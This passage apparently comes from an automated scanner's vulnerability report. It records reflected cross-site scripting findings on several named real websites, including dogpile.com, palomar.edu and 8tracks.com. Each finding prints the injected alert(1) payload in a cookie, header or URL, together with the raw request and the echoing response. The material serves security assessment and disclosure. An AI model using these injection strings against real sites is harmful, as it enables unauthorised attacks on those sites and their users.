Set-Cookie: mnc5=sid=29782a70-8f42-4bb3-a5f5-0c42294bfb13; domain=.BlackSingles.com; expires=Sun, 01-Apr-2012 16:32:37 GMT; path=/
Set-Cookie: mnc5_PromotionID=objname=PromotionID&sliding=False&val=66301&days=3&dateExp=4%2f4%2f2011+9%3a32%3a37+AM&hash=gXZmZd7YT%2fuF4ppEcafsAw%3d%3d; domain=.BlackSingles.com; expires=Mon, 04-Apr-2011 16:32:37 GMT; path=/
Set-Cookie: mnc5_Luggage=objname=Luggage&sliding=False&val=%3fhl%3den%26q%3dc01b6%2522%253balert(1)%2f%2f507cc18a657&days=3&dateExp=4%2f4%2f2011+9%3a32%3a37+AM&hash=shTvH9IZSFK0Xxy2wxFwsA%3d%3d; domain=.BlackSingles.com; expires=Mon, 04-Apr-2011 16:32:37 GMT; path=/
Cache-Control: no-store
Content-Type: text/html; charset=utf-8
Content-Length: 72510
Set-Cookie: NSC_wjq_hmpcbm.tqbsl.dpn_80=0e4367143660;expires=Fri, 01-Apr-11 16:44:24 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
s.prop23 = (clearValue) ? "" : "";
s.prop24 = (clearValue) ? "" : "";
s.prop27 = (clearValue) ? "" : "";
s.prop29 = (clearValue) ? "" : "http://www.google.com/search?hl=en&q=c01b6";alert(1)//507cc18a657";
s.prop30 = (clearValue) ? "" : "";
s.prop31 = (clearValue) ? "" : "";
s.prop32 = (clearValue) ? "" : "";
s.prop33 = (clearValue) ? "" : "";
s.prop36 = (c
...[SNIP]...

2.118. http://www.palomar.edu/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 1afc0<script>alert(1)</script>36d474edfa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=1afc0<script>alert(1)</script>36d474edfa6

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:27:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4692


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   REFERER -
                   http://www.google.com/search?hl=en&q=1afc0<script>alert(1)</script>36d474edfa6
                   <hr width="85%" align="center">
...[SNIP]...

2.119. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.palomar.edu
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload b46a4<script>alert(1)</script>bb137ca376a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)</script>bb137ca376a
Host: www.palomar.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:27:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4655


<html>

<head>

<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">

<titl
...[SNIP]...
<br>
                   BROWSER -
                   curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3b46a4<script>alert(1)</script>bb137ca376a
                   <br>
...[SNIP]...

2.120. http://a.collective-media.net/cmadj/ns.androidtapp/general [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/ns.androidtapp/general

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea575'%3balert(1)//af3836957be was submitted in the cli cookie. This input was echoed as ea575';alert(1)//af3836957be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cmadj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;net=ns;ord=9242949008475990;ord1=123756;cmpgurl=http%253A//www.androidtapp.com/favicon.icoef3b2%25253Cscript%25253Ealert%25281%2529%25253C/script%25253Ed2de5acaa49? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7ea575'%3balert(1)//af3836957be; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; blue=1; qcdp=1; exdp=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7302
Date: Fri, 01 Apr 2011 18:15:56 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-91116311_1301681756","http://ad.doubleclick.net/adj/ns.androidtapp/general;net=ns;u=,ns-91116311_1301681756,11e4f07c0988ac7ea575';alert(1)//af3836957be,Miscellaneous,;;ppos=atf;kw=;tile=2;cmw=nurl;sz=300x250,300x600;net=ns;ord1=123756;contx=Miscellaneous;dc=w;btg=;ord=9242949008475990?","300","250,300",false);</scr'+'ipt>
...[SNIP]...

2.121. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dogpile.com
Path:   /dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6f97"-alert(1)-"16796aa2d2e was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:38 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&ActionId=81494ffc47974db2916bc16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:55:36 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=81494ffc47974db2916bc16a3af0cb01&ActionId=037345b31ef849fab100c16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:36 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:36 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:36 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 50685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=81494ffc47974db2916bc16a3af0cb01&ActionId=037345b31ef849fab100c16a3af0cb01&CookieDomain=.dogpile.come6f97"-alert(1)-"16796aa2d2e; expires=Fri, 01 Apr 2011 17:15:36 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.122. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload b2114<script>alert(1)</script>83bb10cb61c was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568b2114<script>alert(1)</script>83bb10cb61c; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:33 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-33_8406006771301681493; expires=Wed, 30-Mar-2016 18:11:33 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_8406006771301681493; expires=Fri, 01-Apr-2011 18:26:33 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568b2114<script>alert(1)</script>83bb10cb61c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8406006771301681493';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

2.123. http://www.8tracks.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.8tracks.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95c41<script>alert(1)</script>3c9048a049 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico95c41<script>alert(1)</script>3c9048a049 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 170

Redirecting to <a href="http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049">http://8tracks.com/favicon.ico95c41<script>alert(1)</script>3c9048a049</a>

2.124. http://www.8tracks.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.8tracks.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7fd"><script>alert(1)</script>8cdd22bd928 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.8tracks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Type: application/octet-stream
Connection: close
Status: 301
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Location: http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 176

Redirecting to <a href="http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928">http://8tracks.com/favicon.icofb7fd"><script>alert(1)</script>8cdd22bd928</a>

2.125. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/about/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54db6"-alert(1)-"a2bb9b9271 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=530d17a155f848679bfdc16a3af0cb01&CookieDomain=.dogpile.com54db6"-alert(1)-"a2bb9b9271

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=65ee416eb3a24f0fa5bdc16a3af0cb01&CookieDomain=.dogpile.com54db6"-alert(1)-"a2bb9b9271; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:33 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:33 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:32 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=65ee416eb3a24f0fa5bdc16a3af0cb01&CookieDomain=.dogpile.com54db6"-alert(1)-"a2bb9b9271; expires=Fri, 01 Apr 2011 17:34:33 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.126. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33fd5"-alert(1)-"768c24deab8 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.infospaceinc.com/contactus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:55 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8bf114849f6a409d9c06c16a3af0cb01&ActionId=2d7a6054427c4593a5ccc16a3af0cb01&CookieDomain=.dogpile.com33fd5"-alert(1)-"768c24deab8

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=2d7a6054427c4593a5ccc16a3af0cb01&ActionId=130c155302e24583b73bc16a3af0cb01&CookieDomain=.dogpile.com33fd5"-alert(1)-"768c24deab8; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:32:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:12:57 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:12:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:12:56 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 43573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=2d7a6054427c4593a5ccc16a3af0cb01&ActionId=130c155302e24583b73bc16a3af0cb01&CookieDomain=.dogpile.com33fd5"-alert(1)-"768c24deab8; expires=Fri, 01 Apr 2011 17:32:57 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.127. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b752"-alert(1)-"af835610013 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:07 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=530d17a155f848679bfdc16a3af0cb01&ActionId=f4a5e3c498ee4fafa621c16a3af0cb01&CookieDomain=.dogpile.com7b752"-alert(1)-"af835610013

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=b0aa64e9143c4175b855c16a3af0cb01&CookieDomain=.dogpile.com7b752"-alert(1)-"af835610013; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:27 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:27 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 43577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
